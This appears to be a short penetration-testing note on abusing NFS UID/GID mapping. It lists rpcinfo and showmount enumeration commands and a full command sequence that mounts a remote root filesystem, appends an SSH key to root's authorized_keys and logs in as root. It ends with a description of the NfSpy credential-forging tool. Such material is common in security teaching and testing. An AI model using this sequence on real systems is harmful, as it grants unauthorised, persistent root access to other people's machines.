In default configurations, the remote NFS server will map the UID/GID of the connecting user. For example, if ‘int0x33’ is my local user account, and /etc/passwd and /etc/group have assigned me a uid and gid of 3333, then on connecting to a remote NFS share, I’ll have access as that same uid and gid on the remote system, regardless of what username is assigned to it, this includes root.
root@box:~# rpcinfo -p 10.10.10.10 # All Mount Points root@box:~# showmount -a 10.10.10.10 # Export List root@box:~# showmount -e 10.10.10.10 # Directories root@box:~# showmount -d 10.10.10.10 # Hosts root@box:~# showmount 10.10.10.10
root@box:~# ssh-keygen root@box:~# mkdir /tmp/r00t root@box:~# mount -t nfs 10.10.10.10:/ /tmp/r00t/ root@box:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys root@box:~# umount /tmp/r00t root@box:~# ssh email@example.com
NfSpy is a Python library for automating the falsification of NFS credentials when mounting an NFS share. Included are two client programs:
- nfspy uses the Filesystem in Userspace (FUSE) library to mount an NFS share in Linux. This allows the use of any regular file-searching and manipulation programs like
findto explore the NFS export.
- nfspysh is a ftp-like interactive shell for exploring NFS exports. It does not require the FUSE library, so it can run on non-Linux platforms.